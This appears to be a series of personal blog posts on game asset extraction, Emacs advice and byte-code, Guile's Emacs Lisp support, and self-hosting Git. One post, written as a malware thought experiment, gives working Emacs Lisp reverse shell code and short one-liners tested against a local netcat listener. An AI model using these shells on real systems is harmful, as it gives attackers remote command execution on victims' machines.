My relationship with games is complicated. I never had the chance to
get good at them and few I’ve played have been any good. Despite that,
I had both the urge to complete the game and discover how they work
internally. As nearly all commercially developed games happen to be
proprietary, I focused on viewing and extracting their asset files, an
art not unlike reverse engineering of executable files.
Fast-forward many years and I still occasionally play games. At least
I have proper tools at hand now and the knowledge to make sense of
binary formats. Another plus is that people have come to discover the
benefits of the open source spirit to collaborate and share their
knowledge online. Recently I’ve taken a closer look at a certain meme
game in my Steam library. Many of its assets (music, sound effects,
fonts and a single texture) are stored as regular files on disk,
however, there’s an 79M asset file, presumably holding the missing
textures for the game sprites and backgrounds. This blog post will
explore its custom format and inner workings in enough detail to write
your own extraction program.
Reconnaissance
For starters I’ve opened the file in my favorite hex editor
editor and browsed through it, looking for obvious patterns such as
human-readable strings, repetitive byte sequences and anything not
looking like random noise. I’ve found the following:
- A very short header that doesn’t contain any human-readable file
signatures.
- Several file paths, each terminated with a null byte.
- Several 16-byte entries, with columns lining up almost perfectly.
- Several concatenated files, identified by file signatures for the
WebP, PNG and XML formats.
Here’s some screenshots, with the relevant patterns highlighted:
Header and paths section:
Mysterious 16-byte entries, with many even-numbered columns being
zeroes:
WebP file header in files section:
XML file header in files section:
PNG file header in files section:
Given the information so far, several hypotheses can be established:
- The number of paths is the same as the number of embedded files and
every path corresponds to an embedded file.
- The file contains information about how long each embedded file is.
- The mystery section (which I’ll call the index from now on) contains
that information in each of its 16-byte entries
- Each of these entries corresponds to a path and embedded file.
- The association between path, entry and embedded file is ordered,
for example the first path corresponds to the first entry and first
embedded file.
Verification
Each hypothesis can be proven by doing basic mathematics. The most
fundamental assumptions the format relies upon are the number of
paths, index entries and embedded files being the same, and the length
of each embedded file being stored somewhere else in the file,
presumably the index section. I decided to start with the latter, for
which I picked the first embedded file, a WebP image. Its length
can be determined by looking at bytes 4 to 7, decoding them as
unsigned little-endian 32-bit integer and adding 8 to include the
length of the preceding header. The obtained length can be verified by
seeking to the beginning of the file in the hex editor, then seeking
by the length and checking whether that position corresponds to
the start of the next file. Likewise, the length of a PNG file can be
obtained by looking for the IEND sequence followed by a 32-bit
checksum and for XML files by looking for the closing tag.
The first file is 2620176 bytes long and is immediately followed by a
XML file describing it. It corresponds to either 0027fb10 or
10fb2700 when encoded to hex, depending on whether it’s big- or
little-endian. And indeed, the latter value shows up in the last 4
bytes of the first 16-byte entry. I’ve then subsequently verified
whether this property holds true by extracting the file length from
the second 16-byte entry and applying it to the second embedded file.
This left verifying the number of embedded files by counting the
number of paths and entries in their respective sections. I’ve found
335 of them in each, represented as 4f010000 using the previously
encountered little-endian hex notation. That number corresponds to
bytes 4 to 7 in the header, leaving two 4-byte numbers around it. I
haven’t been able to deduce the meaning of the preceding one, but the
succeeding one is a6210000 which corresponds to 8614, the length
of all paths immediately following the file header, thereby giving me
all information necessary to extract the assets.
Further thoughts
Performing the analysis and writing the extraction program took me a
few hours. It could have been a lot trickier, especially if my goal
was to perform game modding. This would require to extract the files,
modify them, then repack them back into the asset file without the
game noticing a change. To do this safely, it’s necessary to perform
deeper analysis of the unknown fields, for example by looking into
other matching metadata of every embedded file or by reverse
engineering the game itself.
Another common problem is that data doesn’t always form clear
patterns, for example if it’s encrypted, compressed or random-looking
for other reasons. Sometimes formats are optimized towards programmer
convenience and may store data necessary to verify the asset file
inside the game instead. This would again not pose a challenge to a
reverse engineer, but would still complicate automatic extraction.
Sometimes team work is necessary. Chances are that tools have been
developed for popular games and may only need minor adjustments to get
working again. One resource I’ve found immensely helpful to gain a
better understanding of common patterns is The Definitive Guide To
Exploring File Formats.
Update: Added a helpful link explaining more opcodes.
Note: This is an expanded version of this Reddit post.
Advice is one of those Emacs Lisp features that you don’t see often in
other programming languages. It enables you to extend almost any
function you’d like by executing code before/after/instead of it and
messing with arguments/return values. But how does it work? And
which of the two implementations of it should be used?
On advice.el
Somewhat surprisingly, advice.el consists of more than 3000 lines,
but more than half of them are comments. It doesn’t quite reach
literate programming level of commentary, but explains its internals
and includes a small tutorial explaining how it works. There are many
bells and whistles, but to keep things simple I’ll focus on the part
of the tutorial that changes a function to manipulate its argument
before execution of the function body. That body can be
programmatically obtained using symbol-function:
(defun foo (x)
"Add 1 to X."
(1+ x))
(symbol-function 'foo)
;; => (defun foo (x) "Add 1 to X." (1+ x))
The example advice fg-add2 adds one to x again before the
actual code is run:
(defadvice foo (before fg-add2 first)
"Add 2 to X."
(setq x (1+ x)))
(symbol-function 'foo)
;; #[128 "<bytecode>"
;; [apply ad-Advice-foo (lambda (x) "Add 1 to X." (1+ x)) nil]
;; 5 nil]
Yikes. How does one make sense of the byte-code?
Interlude: Byte-code disassembly
Emacs Lisp contains two interpreters, a tree walker (takes a s-exp as
input, walks along it and evaluates the branches) and a byte-code
interpreter (takes bytecode, interprets it using a stack VM).
bytecomp.el and byte-opt.el transform s-expressions into
optimized byte-code. I can recommend studying these to understand how
a simple compiler works. The result of this is code expressed in a
stack-oriented fashion using up to 256 fundamental operations.
One can look at it with the disassemble function, which accepts
both function symbols and function definitions:
(disassemble (lambda () 1))
;; byte code:
;; args: nil
;; 0 constant 1
;; 1 return
What happens here is that the constant 1 is pushed to the stack, then
the top of stack is returned. Arguments are treated in a similar
manner:
(disassemble (lambda (x) x))
;; byte code:
;; args: (x)
;; 0 varref x
;; 1 return
Instead of putting a constant on the stack, the value of x is looked
up and pushed to the stack. Finally, an easy function call looks as
follows:
(disassemble (lambda (a b) (message "%S: %S" a b)))
;; byte code:
;; args: (a b)
;; 0 constant message
;; 1 constant "%S: %S"
;; 2 varref a
;; 3 varref b
;; 4 call 3
;; 5 return
Four values are pushed on the stack in function call order, then a
function is called with three arguments. The four stack values are
replaced with its result, then returned. We’re almost ready to tackle
the actually interesting disassembly now and can look up all other
unknown opcodes in this unofficial manual.
You may wonder though, why bother? Why not just use a decompiler?
Or even avoid dealing with byte-compiled code in the first place…
It turns out there are a few reasons going for it:
- Ideally you’d always have access to source code. This is not always
an option. For example it’s not unheard of for an Emacs
installation to only ship byte-compiled sources (hello Debian).
Likewise defining advice as above will byte-compile the function.
Byte-code compilation is done as performance enhancement and
backtraces from optimized functions will contain byte-code.
- The byte-code decompiler we have is clunky and incomplete. It
sometimes fails to make sense of byte-code, meaning you cannot rely
on it. Another thing to consider is that byte-code doesn’t have to
originate from the official byte-code compiler, there’s other
projects generating byte-code that the decompiler may not target.
Suppose someone wants to thwart analysis of (presumably malicious
code), hand-written byte-code would be an option.
- Sometimes byte-code is studied to understand the performance of an
Emacs Lisp function. It’s easier to reason about byte-code than
regular code, especially to see the effects of lexical binding.
- It’s educational to wade through bytecode.c and other Emacs
internals. While there isn’t too much benefit of understanding
Emacs byte-code, the same lessons apply to other stack-oriented VMs,
such as the JVM. Learning this makes reversing proprietary programs
targeting the JVM (such as Android apps) much easier and enables
advanced techniques such as binary patching.
On advice.el (continued)
We’re ready to unravel what foo does:
(disassemble 'foo)
;; byte code for foo:
;; args: (x)
;; 0 constant apply
;; 1 constant ad-Advice-foo
;; 2 constant (lambda (x) "Add 1 to X." (1+ x))
;; 3 stack-ref 3
;; 4 call 3
;; 5 return
apply, ad-Advice-foo and a lambda are placed on the stack.
Then, stack element 3 (zero-indexed) is added to the top of stack. We
already know that elements 0, 1 and 2 are the three constants, element
3 however is the first argument passed to the function. As it turns
out, when lexical binding is enabled, the stack-ref opcode is used
instead of varref. Therefore the byte-code presented is
equivalent to (lambda (&rest arg) (apply 'ad-Advice-foo (lambda (x)
"Add 1 to X." (1+ x))) arg). You can verify by disassembling that
lambda and compare the output with the previous disassembly.
What does ad-Advice-foo do though?
(disassemble 'ad-Advice-foo)
;; byte code for ad-Advice-foo:
;; args: (ad--addoit-function x)
;; 0 constant nil
;; 1 varbind ad-return-value
;; 2 varref x
;; 3 add1
;; 4 varset x
;; 5 varref ad--addoit-function
;; 6 varref x
;; 7 call 1
;; 8 dup
;; 9 varset ad-return-value
;; 10 unbind 1
;; 11 return
This is a bit more to unravel. varbind introduces a temporary
variable, unbind undoes this binding, varset is equivalent to
set and dup pushes a copy of top of stack (kind of like
stack-ref 0 would do). The sequence of constant nil and
varbind ad-return-value is the same as (let ((ad-return-value
nil)) ...). x is retrieved, incremented by 1 and x set to
the result of that, therefore (setq x (1+ x)). Then
ad--addoit-function is called with x as argument. The result
of that is duplicated and ad-return-value is set to it. Finally
stack item 1 is unbound, presumably the temporary variable. Therefore
the byte-code is equivalent to (let (ad-return-value) (setq x (1+
x)) (setq ad-return-value (funcall ad--addoit-function x))). Let’s
see how nadvice.el fares.
On nadvice.el
It’s tiny compared to advice.el, at only 391 lines of code. To
nobody’s surprise it’s lacking bells and whistles such as changing
argument values directly or not activating advice immediately.
Therefore some adjustments are required to create the equivalent
advice with it:
(defun foo-advice (args)
(mapcar '1+ args))
(advice-add 'foo :filter-args 'foo-advice)
(symbol-function 'foo)
;; #[128 "<bytecode>" [apply foo-advice (lambda (x) "Add 1 to X." (1+ x)) nil] 5 nil]
(disassemble 'foo)
;; byte code for foo:
;; args: (x)
;; 0 constant apply
;; 1 constant (lambda (x) "Add 1 to X." (1+ x))
;; 2 constant foo-advice
;; 3 stack-ref 3
;; 4 call 1
;; 5 call 2
;; 6 return
We have our three constants and x on the stack. At first a
function is called with one argument, that would be foo-advice
with x (which represents the argument list). Then a function is
called with two arguments, that is apply with the lambda and the
result of the previous function call. In other words, (lambda
(&rest x) (apply (lambda (x) "Add 1 to X." (1+ x)) (foo-advice x))).
It was a bit less convenient to write, but far easier to understand.
Conclusion
nadvice.el is surprisingly elegant, striking a good balance
between amount of overall features and technical simplicity. Unless
you maintain a package that must keep compatibility with Emacs 24.3 or
earlier, I don’t see a good reason to go for advice.el.
Every now and then there’s someone asking about Emacs and security,
especially when it comes to the question whether one can trust
packages. Short answer: No. Long answer: This question cannot be
answered without defining a threat model first, but honestly, who is
going to bother backdooring an Emacs package?
Yet some lingering doubt remains. There are Emacs users after all who
are high-profile enough to bother attacking. Suppose you wanted to
write malware in Emacs Lisp, one obvious thing to try after gaining
the ability of arbitrary code execution is a remote shell to
comfortably execute commands on someone else’s computer. There are
two flavors of them:
- Bind shell:
- The victim computer listens on LPORT and the attacker connects
to LHOST:LPORT. Any user input from the attacker is sent to a
local shell, output from that shell is returned to the attacker.
- Reverse shell:
- The victim computer establishes a connection to the attacker
listening at RHOST:RPORT. Much like with the bind shell, user
input from the attacker is interpreted by a local shell.
Reverse shells are more popular as they allow circumventing
restrictive firewall rules. There are several cheatsheets for
spawning them with a Bash/Python/Ruby/Perl/… oneliner, most of those
rely on creating a socket, extracting its file descriptor and wiring
it up to a shell process. Unfortunately Emacs doesn’t give you that
information, so I’ve had to settle for a less elegant approach.
Here’s my first attempt using shell-command-to-string to execute
the received process output and process-send-string to send it
back to the process:
(let ((r (make-network-process :name "r"
:host "127.0.0.1"
:service 8080)))
(set-process-filter r (lambda (p s)
(process-send-string p (shell-command-to-string s))))
(read-char))
To test it, launch nc -nlvp 8080 (for GNU netcat) or nc -nlv
8080 (for BSD netcat), save the above to test.el and run
emacs --script test.el. It works, but is sub-optimal for a few
reasons:
- A new shell is spawned every time a batch of user input has been
read. Due to this, changing the directory doesn’t appear to have
any effect.
- The shell seems unresponsive when executing commands generating
large output (for example find /) as shell-command-to-string
collects everything before returning the entirety of it.
- If the chunk of user input received by the process filter doesn’t
resemble a valid shell command (for example by being broken up at an
inconvenient spot), it won’t be executed as expected and might raise
an incomprehensible error.
To fix these issues a dedicated shell subprocess needs to be created.
Output from the network process is sent to the shell subprocess and
vice versa. This makes for slightly longer code:
(let ((r (make-network-process :name "r"
:host "127.0.0.1"
:service 8080))
(c (start-process "s" nil "sh" "-i")))
(set-process-filter r (lambda (_ s) (process-send-string c s)))
(set-process-filter c (lambda (_ s) (process-send-string r s)))
(read-char))
Voila, cd works as expected and the hangs for find / are gone
as well. Time to optimize both for shell oneliners, for that I
eliminate whitespace and carefully adjust the logic:
emacs --batch --eval '(set-process-filter(make-network-process :name"r":host"127.0.0.1":service 8080)(lambda(p s)(process-send-string p (shell-command-to-string s))))' -f read-char
emacs --batch --eval '(progn(setq r(make-network-process :name"r":host"127.0.0.1":service 8080)c(start-process"s"nil"sh""-i"))(set-process-filter r(lambda(_ x)(process-send-string c x)))(set-process-filter c(lambda(_ x)(process-send-string r x))))' -f read-char
These clock in at 180 and 261 chars respectively. Not too shabby
compared to the usual Python/Ruby/Perl oneliners (243/104/216
chars). Unlike them though I cannot upgrade the reverse shell to a
fully interactive one. But who knows, maybe they’ll come in useful
some day if I ever encounter a machine not having common programming
languages installed, but Emacs for some reason…
Update: Factual corrections to Robin Templeton’s work.
Update: Added an extra set of benchmarks for Guile 3 in a Debian
Sid Docker container.
Disclaimer: I don’t use Guile. I hardly know it. There are other
Scheme implementations I know far better. But since Guile Emacs is a
hot topic with much hopes and unproven claims, I experiment with it
every now and then. All “benchmark” results here are to be taken with
caution, they’ve been created using Guile 2.2.6 and Emacs 26.3 on a
Thinkpad X230t running Arch Linux.
With that out of the way, laurus from #emacs reminded me
that one of the reasons why Guile Emacs was possible in the first
place is Guile’s language tower, with Emacs Lisp being one of the
supported languages. But what does that mean? How complete is the
Emacs Lisp support? What can it be used for? These and a few other
questions are the topic of this blog post.
In need of a spec
Standardized programming languages have the great benefit of being
based on a specification one can consult whenever in doubt of how
things are supposed to behave. This allows several competing
implementations to be developed, with their own unique strengths and
benefits. if you adhere to the standard, switching between
implementations isn’t hard and can help shaking out bugs, for example
when compiling your C programs with different compilers.
Things get considerably harder if your chosen language decided to
forego this approach and the correct behavior is defined by it, yet
this didn’t stop people from writing alternative implementations for
programming languages such as Python and Ruby. Emacs Lisp got into a
similar situation ever since Guile was extended to the degree of
supporting Emacs Lisp as an additional language. Provided your
version of Guile is new enough, you can evaluate trivial code in the
REPL:
scheme@(guile-user)> (define foo 1)
scheme@(guile-user)> foo
$1 = 1
scheme@(guile-user)> ,L elisp
Happy hacking with Emacs Lisp! To switch back, type `,L scheme'.
elisp@(guile-user)> (defvar bar 2)
$2 = bar
elisp@(guile-user)> bar
$3 = 2
So far so good. But how much of Emacs Lisp is supported? Not much
apparently, many common functions like message and error are
unbound. It doesn’t seem possible to do anything with buffers or
files either. This greatly limits the possibilities of writing useful
scripts in Emacs Lisp. One way of determining what exactly is
supported would be consulting the source code, but where’s the fun in
that when you could instead test it programmatically, thereby creating
an executable spec…
Generating the spec
The usual test approaches fail me. Reading test inputs via stdin with
read-string? Accessing the arguments with argv? Reading from
a file with insert-file-contents? Obtaining an environment
variable with getenv? None of that is supported. At least you
can print to stdout with princ. I went for a slightly different
approach instead, obtain a list of functions/variables in a
minimal Emacs environment, then generating a test file that checks
their existence and prints a test summary. Here’s the code generation
part:
(defun printf (fmt &rest args)
(princ (apply 'format fmt args)))
(printf ";; elisp spec adherence test
(defvar passed 0)
(defvar failed 0)
(defun test-sym (pred sym)
(if (funcall pred sym)
(setq passed (1+ passed))
(setq failed (1+ failed))))
(defun test-fun (sym) (test-sym 'fboundp sym))
(defun test-var (sym) (test-sym 'boundp sym))\n\n")
(mapatoms
(lambda (atom)
(when (fboundp atom)
(printf "(test-fun '%S)\n" atom))
(when (and (not (keywordp atom)) (boundp atom))
(printf "(test-var '%S)\n" atom))))
(printf "\n")
(printf "(princ \"Passed: \")\n")
(printf "(princ passed)\n")
(printf "(terpri)\n")
(printf "\n")
(printf "(princ \"Failed: \")\n")
(printf "(princ failed)\n")
(printf "(terpri)\n")
Assuming it’s been saved as gen-elisp-spec.el, the executable spec
itself is generated with emacs -Q --batch --script gen-elisp-spec.el
> elisp-spec.el. Here’s a test session using Emacs and Guile:
[wasa@box ~]$ time emacs -Q --batch --script elisp-spec.el
Passed: 9567
Failed: 2
emacs -Q --batch --script elisp-spec.el 0.10s user 0.02s system 99% cpu 0.117 total
[wasa@box ~]$ time guile --language=elisp elisp-spec.el
Passed: 137
Failed: 9432
guile --language=elisp elisp-spec.el 77.62s user 0.27s system 103% cpu 1:15.04 total
This is kind of surprising. I didn’t expect Emacs to fail its own
test and didn’t expect Guile to implement this little either. Most
surprising is the abysmal speed of the test, I’m looking forward
to anyone being able to explain that part to me. Here’s one more test
using the official Debian Sid Docker image with Emacs 26.3 and Guile
3.0.2:
root@d27668492764:/# time emacs -Q --batch --script elisp-spec.el
Passed: 9108
Failed: 2
real 0m0.104s
user 0m0.097s
sys 0m0.007s
root@d27668492764:/# time guile --language=elisp elisp-spec.el
Passed: 137
Failed: 8973
real 6m20.950s
user 10m32.294s
sys 0m7.846s
This is not exactly an improvement. At least the numbers are small
enough to print out the offending symbols, for Emacs it’s atom and
printf (which polluted the test environment), for Guile I’ve taken
the liberty of annotating the list:
;; binding
let let*
;; functions
lambda apply funcall
;; evaluation
eval load eval-and-compile eval-when-compile
;; sequences
aref aset make-vector nth
;; sequencing
progn prog2 prog1
;; iteration
dolist while
;; control flow
if when unless cond
;; short-circuiting
or and not
;; explicit nonlocal exit
throw catch
;; exceptions
signal condition-case unwind-protect
;; input
read-from-minibuffer
;; output
prin1-to-string print princ send-string-to-terminal terpri
;; cxr
car cdr caar cadr cdar cddr
car-safe cdr-safe
nthcdr
;; associations
assoc assq
;; search
member memql memq
;; destructive list processing
nreverse setcar setcdr rplaca rplacd
;; other list processing
cons list make-list `
mapcar mapc
append concat
reverse
length
;; symbols
defconst defvar defun defmacro
get put
fset set setq setplist
symbol-function symbol-name symbol-plist symbol-value
intern make-symbol
fmakunbound makunbound
quote function
;; plist
plist-get plist-put
lax-plist-get lax-plist-put
plist-member
;; strings
string string-match substring
upcase downcase
;; predicates
zerop floatp stringp numberp integerp wholenump
boundp fboundp functionp symbolp
consp listp nlistp
atom null
;; math
1+ 1-
fceiling ffloor ftruncate fround float
abs
min max
;; comparators
> < >= <= /= =
eq eql equal
string-equal string=
;; numerical operators
+ - * %
;; misc
random
Some notable omissions and differences:
- No division. Most likely incompatible with Scheme’s numeric tower.
- Input is read with read-from-minibuffer, not read-string.
- send-string-to-terminal is unusual to have, but most likely the
primitive output function.
- string-match is nice to have, but of limited use without
match-string.
- prin1-to-string exists, prin1 doesn’t.
- print doesn’t add newlines and behaves like prin1 should.
To do anything outside of textbook exercises you’d need to define
extra primitives. Guile’s module/language/elisp/boot.el shows how
to apply a band-aid on some of the previous shortcomings:
(fset '/ (@ (guile) /))
(fset 'read-string 'read-from-minibuffer)
(fset 'prin1 (@ (guile) write))
(defun print (object) (prin1 object) (terpri))
You could write more of it to reach that goal of using Emacs Lisp as
scripting language outside of Emacs, but need to write Scheme to get
there. Why not just use Scheme? Why invent a new runtime? The
effort would be comparable to what node.js did for Chrome’s JavaScript
engine, except with a far weaker sales-pitch.
What does this mean for Guile Emacs?
What I’ve shown above is barely sufficient to bootstrap an Emacs on
top of it. Guile Emacs requires a customized version of Guile and
Emacs, then loads up the supporting Emacs Lisp files to do the rest.
There are more incompatibilities, like called-interactively-p
being stubbed out. Extending the presented rudimentary spec to
contain actual tests would help with tracking progress and usability.
It might even improve the overall quality of GNU Emacs itself,
provided that the core developers are on board and believe in the
idea. I’ve briefly searched emacs-devel for previous discussion on
the topic, but only found bikeshedding about Guile Emacs itself, so
anyone who feels strongly about the subject, feel free to start a
discussion there!
With regards to Guile Emacs itself, the situation is trickier. The
above repositories have not been touched for five years, with Robin
Templeton being the sole contributor for five Google Summer of Code
events. Even though the work is far from complete, it is impressive
what a college student managed to do under supervision of Guile’s
maintainer Andy Wingo and Ludovic Courtès. Further advancements
require similarly motivated individuals to participate in the Guile
community and become part of the effort, much like with other free
software projects. It’s tempting to take a shortcut like donating to
other developers, but unless they’ve figured out a way of converting
that money into equivalent work, there will be little connection
between what you give away and what they do in return. This again is
a topic worth discussing, preferably with the people that can make a
change.
I’m sorry for the dramatic title. Note that I won’t delete my GitHub
account or stop using it, there’s plenty projects hosted there that I
contribute to. This blog post is about my experience with hosting my
personal projects on GitHub and why I stopped doing that.
What’s wrong with GitHub?
It depends on who you ask. There’s a lot going for GitHub:
- Pretty Git repo viewer with integrated issue tracker, wiki and more.
- Many projects chose it as their home.
- Lots of convenience features.
- Highly reliable hosting.
- Social network effects.
On the other hand there’s a few reasons not to use it:
- Don’t put all your eggs into one basket.
- Slow and unreliable at times.
- Owned by Microsoft now.
- Proprietary SaaS.
All of these are good and important points, but they’re unrelated to
my move to selfhosting. Over time I’ve come to dislike the workflow
GitHub helped popularizing:
- Sign up if you haven’t already
- Fork repository in Browser
- Clone forked repository
- Create new branch
- Perform changes on that branch
- Push branch
- Click on “Create pull request” button
- Describe changes and overall motivation
Some projects required an email-driven workflow, for example by virtue
of not being hosted on GitHub and only offering the committer’s email
address as contact option:
- Clone repository
- Perform changes
- Format patch
- Write an email with the patch attached, describing changes and
overall motivation
If you’re feeling fancy, you can even set up Git to handle emails for
you and combine the last two steps into one. I haven’t done that yet;
https://git-send-email.io/ provides a simple tutorial for it
explaining the finer details.
I’ve come to enjoy this process considerably more, mostly because it
doesn’t waste my time on needless Git operations. Another nice
side effect is that one takes more time composing email, thereby
resulting in a higher quality conversation with the other project.
Similarly, there’s other workflows where public discussion on GitHub
is not an option, for example when reporting security issues to a
project. In this case it’s common for the project to provide an email
address and GPG key for secure communication.
On issue trackers
GitHub’s issue tracker is clean and tidy. It may not be as well
suited for large projects, user support or discussing matters beyond
bug reports, but that didn’t stop people from using it for all these
things. Sometimes they’ll go as far as asking other projects to use
GitHub just for that one feature.
I have a completely different problem with it though. Looking back at
the timeline between an issue being opened and closed, they tend to
either follow the pattern of being resolved quickly (anywhere between
a few hours and up to a week) or staying open for a long time,
sometimes up to years. Another such pattern is that development
activity for my projects tends to start with an initial burst of up to
a month, followed by silence and occasional bugfixes. As soon as the
project reached good enough or even finished status, chances are that
I won’t do any further development on it. Seeing a repository with
many open issues makes me unhappy, especially if there’s nothing I can
do about it in the short-term. I’ve seen other projects automating
their issue tracker grooming by closing issues without recent
activity, but it feels dishonest to me and like sweeping the problem
under the rug.
For this reason I’ve decided to go with a different approach,
following the strategy I’ve come up with for bugs involving
attachments that may not be shared publicly for legal reasons:
Send me an email and make sure to include the attachment. Whenever I
receive an email, I make sure to reply to it, this goes back and forth
until a conclusion has been reached (or the issue reporter stops
bothering). This worked surprisingly well so far and integrates
seamlessly into my inbox zero workflow.
A stupid Git viewer
There is no shortage when it comes to self-hostable Git viewers, but
most of them are a tad too social for my needs, with Sourcehut being
the closest match. Another issue for me is security, if I can avoid
it I’d rather not run software with a history of security issues.
After lots of pondering I decided to build a tool for administration
of Git repositories and generation of a static website, satisfying the
following requirements:
- Convert an existing repository to a self-hosted one
- Generate tarballs for all tags
- Provide a raw view of files
- Provide a file listing
- Render READMEs
This excludes a lot of convenience features like browsing the Git
history, other branches, syntax highlighting, search and so on.
To perform these you need to clone the repo and perform the operations
locally. This is what I end up doing anyway when searching a
repository and doing more serious work. Another bonus of this
strategy is having a full copy of the project at hand, which means no
more need for a fork button.
My main inspiration design-wise is Evan Hanson’s Git site. The
Linux Git User Manual helped figuring out how one sets up Git to
pull via HTTPS and push via SSH. Serving a Git repo via HTTPS
requires enabling the example post-update hook, to regenerate the
files and tarballs a post-receive hook is used. Only a handful of
Git commands were necessary for the remaining operations:
- git init: Initialize (bare) repository
- git cat-file: Obtain contents of file
- git update-server-info: Update files for serving via HTTPS
- git ls-tree: Display (full) file tree with metadata
- git archive: Create release tarballs
- git tag: Display tags for release tarballs
This leaves some advanced nginx config. Normally serving a statically
generated site is simple, but in this case I want index pages to be
served as HTML (using text/html as mimetype) and raw files as
plain text (using text/plain as mimetype). Not all raw files
though, images, videos and more should still be served with the
appropriate mimetype. This took some headscratching and
experimentation, but I eventually figured it all out and can fully
recommend nginx beyond its traditional role as ridiculously fast HTTP
server with great reverse proxying support.
You can find my repositories over at https://depp.brause.cc, with
the main repository powering this on https://depp.brause.cc/depp
and some auxiliary tools like git-export (convert existing
repository to self-hosted one) and git-depp (perform maintenance
operations in local repo on remote server, like regenerating static
files).
What now?
I’ve successfully migrated all repositories I own and continue
maintaining from GitHub. Some of them are pulled in by the MELPA
repository and CHICKEN’s egg system. I’ve put up a basic FAQ
for contributors and am curious to see whether they’ll bother
contributing or whether there will instead be forks of the archived
repositories on GitHub.